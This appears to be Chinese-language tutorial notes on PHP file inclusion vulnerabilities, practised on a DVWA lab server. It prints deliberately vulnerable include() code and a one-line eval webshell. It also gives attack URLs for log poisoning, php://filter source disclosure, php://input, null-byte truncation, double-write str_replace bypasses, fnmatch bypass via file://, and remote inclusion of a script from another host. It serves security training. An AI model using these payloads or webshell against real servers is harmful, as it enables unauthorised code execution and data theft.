文件上传及文件包含

目录

• 文件包含漏洞
  • 测试代码
  • 远程文件包含
  • 本地文件包含
    • 本地包含图片马实例
    • 本地包含绕过
      • 一、包含漏洞上传技巧（一句话图片马等）
      • 二、包含日志文件
  • CustomLog "logs/access.log" common
    • 三、PHP包含读文件
    • 四、PHP包含写文件（详解以下）
    • 五、包含截断绕过
    • 六、str_replace函数绕过（字符拼接）
    • 七、fnmatch函数绕过（经过内置协议）
    • PHP内置协议

文件包含漏洞

简介：

包含操做，在大多数Web语言中都会提供的功能，但PHP对于包含文件所提供的功能太强大，太灵活，因此包含漏洞常常出如今PHP语言中，这也就致使了出现了一个错误现状，不少初学者认为包含漏洞只出现PHP语言之中，却不知在其余语言中可能出现包含漏洞。这也应了一句老话:功能越强大，漏洞就越多。

文件包含漏洞其自己就是一个严重的漏洞，其产生的缘由就是

程序员开发的时候，未对包含的文件进行严格过滤、未部署完善给的权限控制，致使攻击者可构造本身的图片木马文件看成程序执行。

包含主要分为本地和远程；远程须要必定的条件，且苛刻，本地相对容易一些。

测试代码

<?php
 $filename = $_GET['filename']; 
include($filename); 
?>

保存为：include.php

远程文件包含

远程包含优势：不须要将木马传到对方服务器，不管木马在任何地方只要在互联网上服务器，都能包含到目标去。

远程包含缺点：条件苛刻

但前提须要知足如下两个条件：

• 魔术符号关闭
• allow_url_include开启

举例：[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eX9E0rdm-1610795266333)(八、文件上传及文件包含.assets/image-20210106103802542.png)]

本地文件包含

本地包含缺点：必须将脚本或者木马传到目标服务器的本地路径下才能包含。

本地包含优势：相对容易实现。

本地包含图片马实例

利用文件包含漏洞：

本地包含绕过

一、包含漏洞上传技巧（一句话图片马等）

一句话马：

<?php @eval($_POST["123"]);?>

直接链接：

是没法利用的。

利用文件包含漏洞使用蚁剑链接：

是成功的，文件被执行。

二、包含日志文件

当某个PHP文件存在本地包含漏洞，而却没法上传正常文件，这就意味这有包含漏洞却不能拿来利用，这时攻击者就有可能会利用apache日志文件来入侵。

Apache服务器运行后会生成两个日志文件，这两个文件是access.log(访问日志)和error.log(错误日志)，apache的日志文件记录下咱们的操做，而且写到访问日志文件access.log之中

那么思路就是当咱们对一个站点页面提交一句话马，找到其日志文件，利用文件包含漏洞达成链接。（全部的实现均创建在理想的条件下思路，即咱们找到了日志路径、具备文件包含漏洞、是apache中间件，不是说百分百，也没有人敢保证百分百。）

首先：

开启通用日志功能

点击“其余选项菜单-打开配置文件-httpd-conf”，打开httpd.conf配置文件，第299行

CustomLog "logs/access.log" common

去掉前边的 # ，并重启apache。

其次，访问一个站点页面，且提交一个一句话马使其留在日志中：

而后寻找一个具备文件包含漏洞的页面进行文件包含日志，在使用蚁剑链接。

http://192.168.18.62:86/DVWA/vulnerabilities/fi/?page=../../../../Apache/logs/access.log

三、PHP包含读文件

http://192.168.18.62:86/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=x.php

访问URL,获得通过base64加密后的字符串，注意：convert.base64-encode

经解密还原获得以下：

解码获得如下内容：

四、PHP包含写文件（详解以下）

注意这个想要达成须要知足下面的条件:

• 只有在allow _url_include为on的时候才可使用

• 同时若是想查看回显结果那必须在C:\php\php-5.2.14-Win32下找到php.ini打开，查找disable_functions = eval,proc-open,oppen,exec,system…….删掉system重启apache。（eval加入的话一句话都连不上了，php中能执行命令的函数加入后，什么都连不上）

  （默认是为空的）

  注意安全加固中：查找display_funtions=写入相关的命令，达到黑名单的临时加固，真正想用白名单就得让开发的重写相关配置。

构造URL: http://192.168.18.62:86/dvwa/vulnerabilities/fi/?page=php://input,而且提交post数据为:

五、包含截断绕过

执行代码：

<?php
	if(isset($_GET['page'])){
		include $_GET['page'] .".php" ;
	}else{
		include 'home.php';
	}
?>

//限制了页面包含只能是.php结尾的文件，通常来讲用户是不可能上传与中间件同类的文件，因此木马通常都是其余的后缀，那么这里就限制了包含的文件类型。

对上面代码的这种绕过方法只适合于magic_quotes_gpc=off的时候， php版本小于5.3.4，与白名单绕过一致，可经过%00截断绕过，不过如今已经很难见到了，好比：index.php?file=info.txt//////////////…………超过必定数据的/

实例：

六、str_replace函数绕过（字符拼接）

以DVWA的模板为例medium，在代码审计角度上，分析一下下面的代码：

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?>

• 使用str_replace函数是极其不安全的，由于可使用双写绕过替换规则。

• 例如page=hthttp://tp://192.168.0.103/phpinfo.txt时，str_replace函数会将http://删除"一次"，因而依然是page=http://192.168.0.103/phpinfo.txt，成功执行远程命令。

• 同时，由于替换的只是“../”、“..\”，因此对采用绝对路径的方式包含文件是不会受到任何限制的。

例如：

一、本地文件包含交替双写绕过（..././代替../）

http://192.168.18.62:86/dvwa/vulnerabilities/fi/page=..././..././robots.txt

二、绝对路径不受任何影响

http://192.168.18.62:86/dvwa/vulnerabilities/fi/page=C:/xampp/htdocs/dvwa/php.ini

三、远程文件包含交替双写绕过

http://192.168.18.62:86/dvwa/vulnerabilities/fi/page=htthttp://p://192.168.18.23/pass.php

七、fnmatch函数绕过（经过内置协议）

以DVWA的模板为例hight，在代码审计角度上，分析一下下面的代码：

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

if(!fnmatch("file*",$file)&&$file!="include.php")

这段代码的意思就是当文件既不是"include.php"也不是"file"（文件名file开头）时才抛出错误，
反之也就是说，若是文件名符合其中一个条件既能够。http://192.168.18.62:86/dvwa/vulnerabilities/fi/?page=file:///C:/test.html 恰好知足"file"（文件名file开头）。

说一下这个file://，在本地新建一个[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GszbwUaD-1610795266395)(八、文件上传及文件包含.assets/image-20210106173615792.png)]

而后浏览器打开，获得如下的效果：

当咱们以知足要求，绕过fnmatch函数的方式构造了下面的语句：

http://192.168.18.62:86/dvwa/vulnerabilities/fi/?page=file:///C:/test.html

直接访问便获得告终果：

PHP内置协议

PHP带有不少内置URL风格的封装协议，可用于相似fopen()、copy()、file_exists()和filesize()的文件系统函数。

具体协议请参照http://www.php.net/manual/zh/wrappers.php

常见的一些：

File://	访问本地文件系统
htt[p://	访问HTTP(s)网址
ftp://	访问FTP(s)URLS
php://	访问各个输入/输出流(I/o streams)
zlib://	压缩流
data://	数据(RFC2397)
ssh2://	Secure Shell 2
expect://	处理交互式的流
glob://	查找匹配的文件路径模式